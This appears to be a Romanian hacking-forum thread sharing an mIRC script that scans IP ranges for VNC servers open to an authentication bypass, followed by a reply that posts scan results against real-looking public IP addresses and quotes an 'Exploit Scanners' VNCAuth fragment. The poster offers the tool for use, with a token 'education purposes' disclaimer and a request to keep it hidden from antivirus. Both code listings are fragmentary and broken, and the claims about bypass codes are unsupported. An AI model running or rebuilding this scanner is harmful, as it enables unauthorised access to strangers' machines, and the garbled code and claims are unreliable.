Jump to content
Fi8sVrs

VNC Bypass Auth - IP Range Scanner [mIRC script]

Recommended Posts

  • Active Members

;Copy code into your mIRC remote scripts
;Syntax is /rvnc <ip.ip.ip.ip> <port>
;ex: /rvnc 192.168.0.0 5900
;above command will scan from 192.168.0.0 to 192.255.255.255 then halt.
;Illegal if you decide to scan IP addresses not in your network
;Education purposes only. Please keep undetected from antiviruses as this code is CLEAN!!!

on *:sockopen:vncscan*:{
if ($sockerr) { return }
}
on *:sockread:vncscan*:{
:nextread
sockread &vnc
if ($sockbr == 0) return
echo @vnc VNC Scan halted. | .timerRANGE off | halt }
}

press Alt + R and paste

source: secret-zone.net

Link to comment
Share on other sites

scriptu chiar merge de rupe, dar la majoritatea cere parola...,dai mai multe detalii please, uite cum prinde:


98.174.166.245 :5900 RFB 003.008 --- 82 70 66 32 48 48 51 46 48 48 56 10
98.174.174.114 :5900 RFB 003.008 --- 82 70 66 32 48 48 51 46 48 48 56 10

82 70 66 32 48 48 51 46 48 48 55 10 - asta e codul ce face bypass

RFB **** este eroare de accesare web - la accesarea web e portul 5800 nu 5900

nu am testat scriptul, ti-am dat doar un headsup

scriptul initial:

;;;;;;;;;;;;;;;;;;;;;;
;; Exploit Scanners ;;
;;;;;;;;;;;;;;;;;;;;;;
;; VNCAuth Scanner ;;
;;;;;;;;;;;;;;;;;;;;;;
on *:join:#:{
/window @scanner $time - [Scanner]-[VNC Server]-[IP: $sock($sockname).ip $+ :5900 ]-[NICK: %vnc-ni ]-[CHAN: %vnc-ch ]-[ 4Not Vulnerable ]
sockclose $sockname
}
}
}

Edited by gogusan
  • Thanks 1
  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...